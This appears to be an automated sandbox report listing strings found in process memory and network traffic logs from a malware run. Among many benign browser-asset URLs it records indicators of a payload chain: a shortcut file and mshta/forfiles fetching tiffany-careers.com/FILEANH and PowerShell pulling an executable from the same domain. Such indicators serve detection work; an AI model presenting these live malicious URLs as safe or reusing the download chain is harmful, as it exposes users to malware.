Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.13.dr, ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log0.13.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.2190194676.0000016D6AC30000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://gaana.com/
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B3707000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B465C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: mshta.exe, 00000004.00000002.2416539000.0000022336CA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://m.kugou.com/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://m.soundcloud.com/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://m.vk.com/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://music.amazon.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://music.apple.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://music.yandex.com
Source: powershell.exe, 00000008.00000002.2347436380.000001BE1FDB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2525830239.00000281C355C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2428787870.00000281B4DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000001C.00000002.2428787870.00000281B4B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://open.spotify.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/0/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/0/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://tidal.com/
Source: powershell.exe, 00000008.00000002.2306595071.000001BE101F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2306595071.000001BE0FF6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com
Source: mshta.exe, 00000004.00000003.2409159957.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416594062.0000022336CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000004.00000003.2403505478.0000022336C85000.00000004.00000020.00020000.00000000.sdmp, R4qP4YM0QX.lnkString found in binary or memory: https://tiffany-careers.com/FILEANH
Source: mshta.exe, 00000004.00000002.2416539000.0000022336CA4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH.
Source: mshta.exe, 00000004.00000002.2418270268.0000022B397D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH...
Source: mshta.exe, 00000004.00000002.2418270268.0000022B39803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH...C
Source: mshta.exe, 00000004.00000002.2419587920.0000022B3EEC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH04
Source: mshta.exe, 00000004.00000002.2415931699.0000022336C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH1
Source: mshta.exe, 00000004.00000002.2419281743.0000022B3D9F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH9
Source: mshta.exe, 00000004.00000002.2416251856.0000022336C85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403505478.0000022336C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANH:
Source: forfiles.exe, 00000000.00000002.2162274242.0000021612830000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2418270268.0000022B39803000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2415931699.0000022336C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHC:
Source: mshta.exe, 00000004.00000002.2417323073.0000022338540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHH
Source: mshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHLMEMH
Source: mshta.exe, 00000004.00000002.2415931699.0000022336C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHO
Source: mshta.exe, 00000004.00000002.2417096883.0000022336D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHataFPS_BROWSED
Source: forfiles.exe, 00000000.00000002.2162201998.00000216127D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHgram
Source: mshta.exe, 00000004.00000003.2408387399.0000022B3F065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHhttps://tiffany-careers.com/FILEANHP
Source: mshta.exe, 00000004.00000002.2415931699.0000022336C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHj
Source: mshta.exe, 00000004.00000002.2418270268.0000022B39803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHl
Source: mshta.exe, 00000004.00000003.2403505478.0000022336C4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416251856.0000022336C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHs
Source: mshta.exe, 00000004.00000002.2416251856.0000022336C85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403505478.0000022336C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/FILEANHtVersion
Source: powershell.exe, 00000008.00000002.2306595071.000001BE101F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/PefjSkkhb.exep
Source: mshta.exe, 00000004.00000003.2409159957.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403041983.0000022336CD6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2416594062.0000022336CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/T
Source: forfiles.exe, 00000000.00000002.2162274242.000002161283C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/fileanh
Source: forfiles.exe, 00000000.00000002.2162274242.000002161283C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/fileanhA
Source: forfiles.exe, 00000000.00000002.2162274242.000002161283C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/fileanhS
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://twitter.com/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://vibe.naver.com/today
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://web.telegram.org/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://web.whatsapp.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.deezer.com/
Source: Guard.exe.20.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 0000001E.00000003.2439143400.00000000051B2000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 0000001E.00000002.3392746726.0000000004621000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.30.dr, Guard.exe.20.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: content_new.js.13.drString found in binary or memory: https://www.google.com/chrome
Source: 078cbb06-9041-42f1-a283-8417e7784ea4.tmp.14.dr, 019e40df-d678-4807-af6d-bd6fccbc228a.tmp.14.drString found in binary or memory: https://www.googleapis.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.iheart.com/podcast/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.instagram.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.last.fm/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.messenger.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.office.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.tiktok.com/
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://www.youtube.com
Source: ee8123f4-d813-4ab1-bbe8-d1213f82bf5f.tmp.13.drString found in binary or memory: https://y.music.163.com/m/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
